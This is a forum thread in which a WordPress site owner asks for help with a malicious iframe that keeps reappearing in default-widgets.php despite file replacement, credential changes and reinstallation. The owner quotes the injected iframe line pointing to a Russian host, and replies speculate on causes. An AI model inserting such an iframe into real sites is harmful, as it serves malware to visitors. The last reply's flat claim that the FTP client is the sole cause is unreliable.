Hello guys, I have this problem going on in my site since almost one month. I find following code into the wp-includes/default-widgets.php and default-widgets.php files. <iframe width=392 height=208 src="http://biovoz.ru:8080/index.php" ></iframe> First I uploaded new version of these two files and solved the problem. But I get the problem again with in 24 hours. Same problem. And then I even changed the database name and database username and password. Still no improvement. I remove this and it comes back within 24 hours. And then I uninstalled whole wordpress CMS and reinstalled it. But guess what, it got same problem within 3 hours. Any idea how can I get rid of this ? Thanks
Are you on a shared hosting? It might be the server. Do you have the lastest Wordpress version? Are the plugins updated to the lastest version? if so, you might try to disable the plugins one by one to see if any of them has a security flaw.
I have latest wordpress version. I haven't installed a single plugin. And its on reseller account. Other blogs hosted on same reseller account doesn't have this problem. Only with this domain.
It does not matter which wordpress version you are using because it is due to your FTP client software. More info : How To Completely Remove All Malicious Iframes on Your Website Forever